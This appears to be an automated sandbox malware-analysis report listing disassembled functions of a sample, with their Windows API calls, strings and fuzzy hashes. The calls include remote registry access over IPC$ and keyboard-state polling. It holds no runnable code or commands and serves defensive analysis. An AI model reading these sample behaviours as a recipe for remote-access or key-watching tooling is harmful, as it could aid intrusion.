                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                        • String ID:
                                                                        • API String ID: 3096461208-0
                                                                        • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                        • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                                        • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                        • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                                        Function 004714D9 Relevance: 18.1, APIs: 12, Instructions: 132windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                                        • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                                        • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                                        • DeleteObject.GDI32(?), ref: 0047151E
                                                                        • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                                        • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                                        • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                                        • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                                        • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                                        • DeleteObject.GDI32(?), ref: 004715EA
                                                                        • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                        • String ID:
                                                                        • API String ID: 3218148540-0
                                                                        • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                        • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                                        • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                        • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                                        Function 00433784 Relevance: 18.1, APIs: 12, Instructions: 119COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                        • String ID:
                                                                        • API String ID: 136442275-0
                                                                        • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                        • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                                        • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                        • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                                        Function 00467408 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 308COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _wcsncpy.LIBCMT ref: 00467490
                                                                        • _wcsncpy.LIBCMT ref: 004674BC
                                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                        • _wcstok.LIBCMT ref: 004674FF
                                                                          • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                        • _wcstok.LIBCMT ref: 004675B2
                                                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                        • _wcslen.LIBCMT ref: 00467793
                                                                        • _wcscpy.LIBCMT ref: 00467641
                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                        • _wcslen.LIBCMT ref: 004677BD
                                                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                          • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                        • String ID: X
                                                                        • API String ID: 3104067586-3081909835
                                                                        • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                        • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                                        • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                        • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                                        Function 00461014 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                                        • _wcslen.LIBCMT ref: 004610A3
                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                                        • GetWindowRect.USER32(?,?), ref: 00461248
                                                                          • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                                        • String ID: ThumbnailClass
                                                                        • API String ID: 4136854206-1241985126
                                                                        • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                        • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                                        • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                        • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                                        Function 004718BA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                                        • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                                        • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                                        • GetClientRect.USER32(?,?), ref: 00471A1A
                                                                        • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                                        • DestroyIcon.USER32(?), ref: 00471AF4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                        • String ID: 2
                                                                        • API String ID: 1331449709-450215437
                                                                        • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                        • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                                        • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                        • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                                        Function 0046081F Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                        • __swprintf.LIBCMT ref: 00460915
                                                                        • __swprintf.LIBCMT ref: 0046092D
                                                                        • _wprintf.LIBCMT ref: 004609E1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                                        • API String ID: 3054410614-2561132961
                                                                        • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                        • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                                        • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                        • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                                        Function 00458651 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                                        • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                        • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                        • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                        • API String ID: 600699880-22481851
                                                                        • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                        • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                                        • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                        • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                                        Function 00450C41 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: DestroyWindow
                                                                        • String ID: static
                                                                        • API String ID: 3375834691-2160076837
                                                                        • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                        • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                                        • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                        • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                                        Function 0045D94B Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 88COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                        • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$DriveType
                                                                        • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                        • API String ID: 2907320926-3566645568
                                                                        • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                        • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                                        • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                        • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                                        Function 00470928 Relevance: 16.7, APIs: 11, Instructions: 166windowtimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                        • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                                        • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                                        • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                                        • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                                        • DeleteObject.GDI32(00620000), ref: 00470A04
                                                                        • DestroyIcon.USER32(00720065), ref: 00470A1C
                                                                        • DeleteObject.GDI32(F788F480), ref: 00470A34
                                                                        • DestroyWindow.USER32(003A0043), ref: 00470A4C
                                                                        • DestroyIcon.USER32(?), ref: 00470A73
                                                                        • DestroyIcon.USER32(?), ref: 00470A81
                                                                        • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                                        • String ID:
                                                                        • API String ID: 1237572874-0
                                                                        • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                        • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                                        • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                        • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                                        Function 00479362 Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                        • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                        • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                        • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                                        • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                        • VariantClear.OLEAUT32(?), ref: 00479489
                                                                        • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                                        • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                        • String ID:
                                                                        • API String ID: 2706829360-0
                                                                        • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                        • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                                        • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                        • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                                        Function 004447E0 Relevance: 16.6, APIs: 11, Instructions: 130keyboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?), ref: 0044480E
                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                                        • GetKeyState.USER32(000000A0), ref: 004448AA
                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                                        • GetKeyState.USER32(000000A1), ref: 004448D9
                                                                        • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                                        • GetKeyState.USER32(00000011), ref: 00444903
                                                                        • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                                        • GetKeyState.USER32(00000012), ref: 0044492D
                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                                        • GetKeyState.USER32(0000005B), ref: 00444958
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
